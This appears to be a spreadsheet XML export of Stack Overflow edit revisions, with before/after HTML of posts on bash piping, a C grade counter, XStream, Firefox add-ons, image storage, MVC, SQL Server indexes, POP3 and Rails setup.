 &lt;p&gt; With &lt;strong&gt;bash&lt;/strong&gt;, you might try though:&lt;/p&gt; _x000D_
 &lt;pre class="lang-sh s-code-block hljs bash"&gt;&lt;code&gt; diff &amp;lt;(foo | bar) &amp;lt;(baz | quux)_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; As mentioned in the &lt;a href="http://stackoverflow.com/questions/345505#345536"&gt;BenM's detailed answer&lt;/a&gt;, &lt;code&gt;&amp;lt;&lt;/code&gt; creates anonymous named pipes -- managed by bash -- so they are created and destroyed automatically, unlike temporary files.&lt;br&gt; However, &lt;a href="http://stackoverflow.com/questions/345505#345558"&gt;Daniel Cassidy&lt;/a&gt; points out the "without using temporary files" part of the question is not respected: the file system is still modified (with a directory entry representing the named pipe created and then removed)&lt;/p&gt; _x000D_
 &lt;p&gt; Otherwise, like you mention in your question, you have to use - as STDIN&lt;/p&gt; _x000D_
 &lt;pre class="lang-sh s-code-block hljs bash"&gt;&lt;code&gt; foo | bar &amp;gt; file1.txt &amp;amp;&amp;amp; baz | quux | diff file1.txt - &amp;amp;&amp;amp; rm file1.txt_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;, since there seems to be no easy way to pipe multiple inputs to one command.&lt;/p&gt; _x000D_
 &lt;p&gt; You can&lt;span class="diff-add"&gt; only&lt;/span&gt; pipe &lt;em&gt;one output&lt;/em&gt; to &lt;em&gt;multiple inputs&lt;/em&gt; with the tee command:&lt;/p&gt; _x000D_
 &lt;pre class="lang-sh s-code-block hljs bash"&gt;&lt;code&gt;ls *.txt | tee&lt;span class="diff-add"&gt; /dev/tty&lt;/span&gt; txtlist.txt _x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The above command displays the output of ls *.txt to the terminal and outputs it to the text file txtlist.txt.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>hlovdal</t>
  </si>
  <si>
    <t>silvalli</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Hi guys &lt;span class="diff-delete"&gt;i&lt;/span&gt; want to &lt;span class="diff-delete"&gt;creat&lt;/span&gt; a program that &lt;span class="diff-delete"&gt;request&lt;/span&gt; from user 10 grades and then &lt;span class="diff-delete"&gt;filter&lt;/span&gt; them to pass and fail then &lt;span class="diff-delete"&gt;print&lt;/span&gt; the number of passes and fails&lt;span class="diff-delete"&gt; i&lt;/span&gt; did the program but the &lt;span class="diff-delete"&gt;out put&lt;/span&gt; is &lt;span class="diff-delete"&gt;wronge&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;pre class="lang-c s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;int&lt;/span&gt; pass,fail,grade,studentcounter;_x000D_
pass=&lt;span class="hljs-number"&gt;0&lt;/span&gt;;_x000D_
fail=&lt;span class="hljs-number"&gt;0&lt;/span&gt;;_x000D_
grade=&lt;span class="hljs-number"&gt;0&lt;/span&gt;;_x000D_
studentcounter=&lt;span class="hljs-number"&gt;0&lt;/span&gt;;&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
_x000D_
&lt;span class="hljs-keyword"&gt;while&lt;/span&gt; (studentcounter!=&lt;span class="hljs-number"&gt;0&lt;/span&gt;)_x000D_
{_x000D_
    &lt;span class="hljs-built_in"&gt;printf&lt;/span&gt;(&lt;span class="hljs-string"&gt;"enter the next grade\n"&lt;/span&gt;);_x000D_
    &lt;span class="hljs-built_in"&gt;scanf&lt;/span&gt;(&lt;span class="hljs-string"&gt;"%d"&lt;/span&gt;,grade);_x000D_
    student--;_x000D_
}_x000D_
_x000D_
&lt;span class="hljs-keyword"&gt;switch&lt;/span&gt; (grade)_x000D_
{_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;&lt;span class="hljs-keyword"&gt;case&lt;/span&gt; &lt;span class="hljs-number"&gt;1&lt;/span&gt;:_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    &lt;span class="hljs-keyword"&gt;if&lt;/span&gt;(grade &lt;span class="diff-delete"&gt;&amp;gt;=&lt;span class="hljs-number"&gt;50&lt;/span&gt;&lt;/span&gt;)_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;        pass++;_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    &lt;span class="hljs-keyword"&gt;break&lt;/span&gt;;_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;&lt;span class="hljs-keyword"&gt;case&lt;/span&gt; &lt;span class="hljs-number"&gt;2&lt;/span&gt;:_x000D_
&lt;span class="diff-delete"&gt; &lt;/span&gt;       &lt;span class="diff-delete"&gt;&lt;span class="hljs-keyword"&gt;if&lt;/span&gt;(grade&amp;lt;=&lt;span class="hljs-number"&gt;49&lt;/span&gt;&lt;/span&gt;)_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;        fail++;_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    &lt;span class="hljs-keyword"&gt;break&lt;/span&gt;;_x000D_
}_x000D_
_x000D_
&lt;span class="hljs-built_in"&gt;printf&lt;/span&gt;(&lt;span class="hljs-string"&gt;"the number of fail is %d"&lt;/span&gt;,fail);&lt;span class="diff-delete"&gt;    &lt;/span&gt;_x000D_
&lt;span class="hljs-built_in"&gt;printf&lt;/span&gt;(&lt;span class="hljs-string"&gt;"the number of pass is %d"&lt;/span&gt;,pass);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;the&lt;/span&gt; problem is that the program request the ten grades but at the end it will print the number of fail and the number of pass as zero&lt;span class="diff-delete"&gt; , why&lt;/span&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Hi guys &lt;span class="diff-add"&gt;I&lt;/span&gt; want to &lt;span class="diff-add"&gt;create&lt;/span&gt; a program that &lt;span class="diff-add"&gt;requests&lt;/span&gt; from&lt;span class="diff-add"&gt; the&lt;/span&gt; user 10 grades and then &lt;span class="diff-add"&gt;filters&lt;/span&gt; them to pass and fail&lt;span class="diff-add"&gt;,&lt;/span&gt; then &lt;span class="diff-add"&gt;prints&lt;/span&gt; the number of passes and fails&lt;span class="diff-add"&gt;. I&lt;/span&gt; did the program but the &lt;span class="diff-add"&gt;output&lt;/span&gt; is &lt;span class="diff-add"&gt;wrong.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;pre class="lang-c s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;int&lt;/span&gt; pass,fail,grade,studentcounter;&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;_x000D_
pass=&lt;span class="hljs-number"&gt;0&lt;/span&gt;;_x000D_
fail=&lt;span class="hljs-number"&gt;0&lt;/span&gt;;_x000D_
grade=&lt;span class="hljs-number"&gt;0&lt;/span&gt;;_x000D_
studentcounter=&lt;span class="hljs-number"&gt;0&lt;/span&gt;;_x000D_
_x000D_
&lt;span class="hljs-keyword"&gt;while&lt;/span&gt; (studentcounter!=&lt;span class="hljs-number"&gt;0&lt;/span&gt;)_x000D_
{&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;_x000D_
    &lt;span class="hljs-built_in"&gt;printf&lt;/span&gt;(&lt;span class="hljs-string"&gt;"enter the next grade\n"&lt;/span&gt;);_x000D_
    &lt;span class="hljs-built_in"&gt;scanf&lt;/span&gt;(&lt;span class="hljs-string"&gt;"%d"&lt;/span&gt;,grade);_x000D_
    student--;_x000D_
}_x000D_
_x000D_
&lt;span class="hljs-keyword"&gt;switch&lt;/span&gt; (grade)_x000D_
{_x000D_
&lt;span class="hljs-keyword"&gt;case&lt;/span&gt; &lt;span class="hljs-number"&gt;1&lt;/span&gt;:_x000D_
    &lt;span class="hljs-keyword"&gt;if&lt;/span&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;(grade &lt;span class="diff-add"&gt;&amp;gt;= &lt;span class="hljs-number"&gt;50&lt;/span&gt;&lt;/span&gt;)_x000D_
        pass++;_x000D_
    &lt;span class="hljs-keyword"&gt;break&lt;/span&gt;;_x000D_
&lt;span class="hljs-keyword"&gt;case&lt;/span&gt; &lt;span class="hljs-number"&gt;2&lt;/span&gt;:_x000D_
    &lt;span class="diff-add"&gt;&lt;span class="hljs-keyword"&gt;if&lt;/span&gt;&lt;/span&gt; &lt;span class="diff-add"&gt;(grade&lt;/span&gt; &lt;span class="diff-add"&gt;&amp;lt;=&lt;/span&gt; &lt;span class="diff-add"&gt;&lt;span class="hljs-number"&gt;49&lt;/span&gt;&lt;/span&gt;)_x000D_
        fail++;_x000D_
    &lt;span class="hljs-keyword"&gt;break&lt;/span&gt;;_x000D_
}&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;}&lt;/span&gt;_x000D_
&lt;span class="hljs-built_in"&gt;printf&lt;/span&gt;(&lt;span class="hljs-string"&gt;"the number of fail is %d"&lt;/span&gt;,fail);_x000D_
&lt;span class="hljs-built_in"&gt;printf&lt;/span&gt;(&lt;span class="hljs-string"&gt;"the number of pass is %d"&lt;/span&gt;,pass);&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;}_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;The&lt;/span&gt; problem is that the program request the ten grades but at the end it will print the number of fail and the number of pass as zero&lt;span class="diff-add"&gt;. Why&lt;/span&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Is there a YAML driver for the Java &lt;a href="http://xstream.codehaus.org/" rel="nofollow noreferrer"&gt;XStream&lt;/a&gt; package?&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; I'm already using XStream to &lt;span class="diff-delete"&gt;serialize&lt;/span&gt;/&lt;span class="diff-delete"&gt;deserialize&lt;/span&gt; both XML and JSON. I'd like to be able to do the same with YAML.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Is there a YAML driver for the Java &lt;a href="http://xstream.codehaus.org/" rel="nofollow noreferrer"&gt;XStream&lt;/a&gt; package?&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; I'm already using XStream to &lt;span class="diff-add"&gt;serialise&lt;/span&gt;/&lt;span class="diff-add"&gt;deserialise&lt;/span&gt; both XML and JSON. I'd like to be able to do the same with YAML.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What firefox &lt;span class="diff-delete"&gt;addons&lt;/span&gt; could &lt;span class="diff-delete"&gt;help a&lt;/span&gt; webdev&lt;span class="diff-delete"&gt; in work&lt;/span&gt;?&lt;/p&gt; _x000D_
 &lt;p&gt; My&lt;span class="diff-delete"&gt; current&lt;/span&gt; list would &lt;span class="diff-delete"&gt;is&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/3227" rel="nofollow noreferrer"&gt;DBGBar&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="https://addons.mozilla.org/nl/firefox/addon/6622" rel="nofollow noreferrer"&gt;Dom Inspector&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt; Firebug&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/6683" rel="nofollow noreferrer"&gt;Firecookie&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt; Google toolbar (useful for seo)&lt;/li&gt; _x000D_
  &lt;li&gt; Live HTTP&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="https://addons.mozilla.org/nl/firefox/addon/115" rel="nofollow noreferrer"&gt;ReloadEvery&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt; TamperData&lt;/li&gt; _x000D_
  &lt;li&gt; Web Developer&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Kindly tell me&lt;/span&gt; any &lt;span class="diff-delete"&gt;other addons or plugins&lt;/span&gt; that &lt;span class="diff-delete"&gt;fit the criteria and would help improve my work&lt;/span&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What firefox &lt;span class="diff-add"&gt;plugins&lt;/span&gt; could &lt;span class="diff-add"&gt;you not live without, as relates to&lt;/span&gt; webdev?&lt;/p&gt; _x000D_
 &lt;p&gt; My list would &lt;span class="diff-add"&gt;be&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/3227" rel="nofollow noreferrer"&gt;DBGBar&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="https://addons.mozilla.org/nl/firefox/addon/6622" rel="nofollow noreferrer"&gt;Dom Inspector&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt; Firebug&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/6683" rel="nofollow noreferrer"&gt;Firecookie&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt; Google toolbar (useful for seo)&lt;/li&gt; _x000D_
  &lt;li&gt; Live HTTP&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="https://addons.mozilla.org/nl/firefox/addon/115" rel="nofollow noreferrer"&gt;ReloadEvery&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt; TamperData&lt;/li&gt; _x000D_
  &lt;li&gt; Web Developer&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;I am always on the lookout for new ones though, so I wonder if anyone knows of&lt;/span&gt; any &lt;span class="diff-add"&gt;great ones&lt;/span&gt; that &lt;span class="diff-add"&gt;I may have missed&lt;/span&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Dirk</t>
  </si>
  <si>
    <t>ashadman</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm writing an application that allows users to upload images onto the server. I expect about 20 images per day all jpeg and probably not edited/resized. (This is another question, how to resize the images on the server side before storing. Maybe someone can please drop a .NET resource for that in the comment or so). I wonder now what the best practice for storing uploaded images is.&lt;/p&gt; _x000D_
 &lt;p&gt; Is it &lt;strong&gt;a) I store the images as a file in the file system and create a record in a table with the exact path to that image.&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; or &lt;strong&gt;b) I store the image itself in a table using an "image" or "binary data" data type of the database server.&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; I see advantages and disadvantages in both. I like a) because I can easily relocate the files and just have to change the table entry. On the other hand I don't like storing business data on the web server and I don't really want to connect the web server to any other datasource that holds business data (for security reasons) I like b) because all the information is in one place and easily accessible by a query. On the other hand the database will get very big very soon. Outsourcing that data could be more difficult.&lt;/p&gt; _x000D_
 &lt;p&gt; Cheers, Tobias&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Edit: &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/3748/storing-images-in-db-yea-or-nay"&gt;&lt;span class="diff-delete"&gt;Storing Images in DB - Yea or Nay?&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm writing an application that allows users to upload images onto the server. I expect about 20 images per day all jpeg and probably not edited/resized. (This is another question, how to resize the images on the server side before storing. Maybe someone can please drop a .NET resource for that in the comment or so). I wonder now what the best practice for storing uploaded images is.&lt;/p&gt; _x000D_
 &lt;p&gt; Is it &lt;strong&gt;a) I store the images as a file in the file system and create a record in a table with the exact path to that image.&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; or &lt;strong&gt;b) I store the image itself in a table using an "image" or "binary data" data type of the database server.&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; I see advantages and disadvantages in both. I like a) because I can easily relocate the files and just have to change the table entry. On the other hand I don't like storing business data on the web server and I don't really want to connect the web server to any other datasource that holds business data (for security reasons) I like b) because all the information is in one place and easily accessible by a query. On the other hand the database will get very big very soon. Outsourcing that data could be more difficult.&lt;/p&gt; _x000D_
 &lt;p&gt; Cheers, Tobias&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Tobias</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've been having an agruement with a friend that Mason (Perl) is not a framework, but a templating language. I feel Mason for Perl does what JSP does for Java (as an analogy, not pure technical comparison). From what I know, JSP is not a framework and I feel neither is Mason. When I looked up wikipedia [http://en.wikipedia.org/wiki/Mason_(Perl)], I see that the main site says it is a web application framework written in Perl while the discussion page contests it.&lt;/p&gt; _x000D_
 &lt;p&gt; Any pointers on why it is/ it is not a framework?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've been having an agruement with a friend that Mason (Perl) is not a framework, but a templating language. I feel Mason for Perl does what JSP does for Java (as an analogy, not pure technical comparison). From what I know, JSP is not a framework and I feel neither is Mason. When I looked up wikipedia [http://en.wikipedia.org/wiki/Mason_(Perl)], I see that the main site says it is a web application framework written in Perl while the discussion page contests it.&lt;/p&gt; _x000D_
 &lt;p&gt; Any pointers on why it is/ it is not a framework?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Update based on comments from ysth: For a framework, I feel it should at least make db access easy, manage sessions, basic security that a webapp would need, templating and code reuse (or libraries that make basic tasks easy).&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Arvind</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Anyone know a good lib where i can run the strings before they are inserted, that can strip out sql/javascript code? To be run in jsp pages.&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Ideally&lt;/span&gt; the lib would be:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Free&lt;/li&gt; _x000D_
  &lt;li&gt; Lightweight&lt;/li&gt; _x000D_
  &lt;li&gt; Easy to use&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Anyone know a good lib where i can run the strings before they are inserted, that can strip out sql/javascript code? To be run in jsp pages.&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;Idealy&lt;/span&gt; the lib would be:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Free&lt;/li&gt; _x000D_
  &lt;li&gt; Lightweight&lt;/li&gt; _x000D_
  &lt;li&gt; Easy to use&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Thanks in advance to the SO community who will happily reply :)&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I need to minify some C# code in a handful of Silverlight .cs and .xmal files. What are your tips for maintaining one code base and running a "tool" to generate minified code for a project?&lt;/p&gt; _x000D_
 &lt;p&gt; Are there any tools (like Resharper) that will do this? If not fully, partially or assist in some way...&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I need to minify some C# code in a handful of Silverlight .cs and .xmal files. What are your tips for maintaining one code base and running a "tool" to generate minified code for a project?&lt;/p&gt; _x000D_
 &lt;p&gt; Are there any tools (like Resharper) that will do this? If not fully, partially or assist in some way...&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; EDIT: I realize that there is no need for C# minification. This is an exercise that I'm doing that does not make sense on the face of it. (This is not homework.)&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Guy</t>
  </si>
  <si>
    <t>Powerlord</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt;
                            &lt;p&gt; How do I append to an array in &lt;span class="diff-delete"&gt;JavaScript?&lt;/span&gt;&lt;/p&gt;
                        &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt;
                            &lt;p&gt;&lt;span class="diff-add"&gt; OK.&lt;/span&gt;&lt;/p&gt;&lt;span class="diff-add"&gt;
&lt;/span&gt;&lt;p&gt; How do I append to an array in &lt;span class="diff-add"&gt;Javascript.&lt;/span&gt;&lt;/p&gt;&lt;span class="diff-add"&gt;
&lt;/span&gt;&lt;p&gt;&lt;span class="diff-add"&gt; Update : actually&lt;/span&gt;&lt;/p&gt;&lt;span class="diff-add"&gt;
&lt;/span&gt;&lt;pre class="lang-js s-code-block hljs javascript"&gt;&lt;code&gt;&lt;span class="diff-add"&gt;a.push(b) 
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;span class="diff-add"&gt;
&lt;/span&gt;&lt;p&gt;&lt;span class="diff-add"&gt; does work. Realize that my previous problem was b not having a value.&lt;/span&gt;&lt;/p&gt;&lt;span class="diff-add"&gt;
&lt;/span&gt;&lt;p&gt;&lt;span class="diff-add"&gt; Ok, I answered myself, but might as well leave this here on SO to help other newbies.&lt;/span&gt;&lt;/p&gt;
                        &lt;/div&gt;</t>
  </si>
  <si>
    <t>no?????z???</t>
  </si>
  <si>
    <t>Boann</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm in the process of extending and improving a website that has quite a few structural problems. It looks very much like the developers before me had heard of MVC but didn't understand the ideas of abstraction or modularity. So the MVC "framework" &lt;span class="diff-delete"&gt;is;&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-delete"&gt; bespoke,&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-delete"&gt; broken,&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-delete"&gt; patched and,&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-delete"&gt; there are several in use all at once.&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; I intend to fix that.&lt;/p&gt; _x000D_
 &lt;p&gt; This is not the first time I've re-built a site's framework, BTW, but it is the first time I've had to fix an MVC framework. However, I'm coming up against some missing holes in the MVC knowledge here on SO.&lt;/p&gt; _x000D_
 &lt;p&gt; The first is how closely programmers seem to tie their SQL database with their models. This doesn't make sense to me: do programmers normally have the model looking after the data abstraction? (To me this is little better than putting SQL in raw PHP code.) Or is there a data access layer normally employed that "Does SQL"? I know from experience that the latter means the calling code doesn't have to worry about where the data is, or how to get it or how to write it: the API handles that.&lt;/p&gt; _x000D_
 &lt;p&gt; But what about the Models? Are they intended to be re-usable amongst different pages? Should they care about just where the data is stored? Shouldn't they be more concerned with handling the logic between data-fetch and data-show (e.g. turning a contact's group ID into a displayable name)? And data-save and data-write (e.g. figuring out how to turn $_POST values into savable data)?&lt;/p&gt; _x000D_
 &lt;p&gt; Maybe the MVC model really be DMVC - Data-Model-View-Controller.&lt;/p&gt; _x000D_
 &lt;p&gt; Lastly, although this is from a PHP point-of-view, how well do these concepts translate to a JSP site?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm in the process of extending and improving a website that has quite a few structural problems. It looks very much like the developers before me had heard of MVC but didn't understand the ideas of abstraction or modularity. So the MVC "framework" &lt;span class="diff-add"&gt;is a) bespoke b) broken c) patched and d) there are several in use all at once.&lt;/span&gt; I intend to fix that.&lt;/p&gt; _x000D_
 &lt;p&gt; This is not the first time I've re-built a site's framework, BTW, but it is the first time I've had to fix an MVC framework. However, I'm coming up against some missing holes in the MVC knowledge here on SO.&lt;/p&gt; _x000D_
 &lt;p&gt; The first is how closely programmers seem to tie their SQL database with their models. This doesn't make sense to me: do programmers normally have the model looking after the data abstraction? (To me this is little better than putting SQL in raw PHP code.) Or is there a data access layer normally employed that "Does SQL"? I know from experience that the latter means the calling code doesn't have to worry about where the data is, or how to get it or how to write it: the API handles that.&lt;/p&gt; _x000D_
 &lt;p&gt; But what about the Models? Are they intended to be re-usable amongst different pages? Should they care about just where the data is stored? Shouldn't they be more concerned with handling the logic between data-fetch and data-show (e.g. turning a contact's group ID into a displayable name)? And data-save and data-write (e.g. figuring out how to turn $_POST values into savable data)?&lt;/p&gt; _x000D_
 &lt;p&gt; Maybe the MVC model really be DMVC - Data-Model-View-Controller.&lt;/p&gt; _x000D_
 &lt;p&gt; Lastly, although this is from a PHP point-of-view, how well do these concepts translate to a JSP site?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>staticsan</t>
  </si>
  <si>
    <t>Xenph Yan</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What are the things that &lt;span class="diff-delete"&gt;you would consider&lt;/span&gt; when defining indexes, clustered and non-clustered, for SQL Server? Are there any anti-patterns that DB newbies should be aware of? Please explain the "Why" or provide references if possible.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What are the things that &lt;span class="diff-add"&gt;should be considered&lt;/span&gt; when defining indexes, clustered and non-clustered, for SQL Server? Are there any anti-patterns that DB newbies should be aware of? Please explain the "Why" or provide references if possible.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Buu Nguyen</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am using an open source client to programmatically process incoming emails (&lt;em&gt;&lt;span class="diff-delete"&gt;on Windows 2003&lt;/span&gt;&lt;/em&gt;). The only way to prevent receiving previously read emails is to delete them from the server. This is less than ideal. As far as I know, there is no command in Pop3 to set emails as being read. So how do you go about this?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am using an open source client to programmatically process incoming emails (&lt;span class="diff-add"&gt;on Windows 2003&lt;/span&gt;). The only way to prevent receiving previously read emails is to delete them from the server. This is less than ideal. As far as I know, there is no command in Pop3 to set emails as being read. So how do you go about this?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Enigmativity</t>
  </si>
  <si>
    <t>Konrad Krakowiak</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; So like many people, I'm excited about Ruby on Rails. Being a Windows user, I downloaded InstantRails, got it going, and followed along with the screencast on how to make a blog with RoR 2.0 in fifteen minutes. I used Notepad++ as my text editor, because that's what I've traditionally used for writing the PHP-based websites I've done in the past. I was a little envious of Mac users and how they get the really attractive-looking TextMate, but I managed to follow through the entire screencast and get everything working smoothly.&lt;/p&gt; _x000D_
 &lt;p&gt; However, I was lost most of the time.&lt;/p&gt; _x000D_
 &lt;p&gt; I know plenty of programming and scripting languages over the years - C++, JavaScript, PHP, HTML, and Lua just to name a few. I don't know Ruby, but I understand a lot of how it works, as far as the syntax is concerned, but I don't understand a lot of the logic behind why certain files do certain things, and that sort of thing.&lt;/p&gt; _x000D_
 &lt;p&gt; Also, I tried Aptana with RadRails, but found it difficult to set up. Is there any concrete tutorial for getting it set up and working fully with Ruby on Rails 2.0?&lt;/p&gt; _x000D_
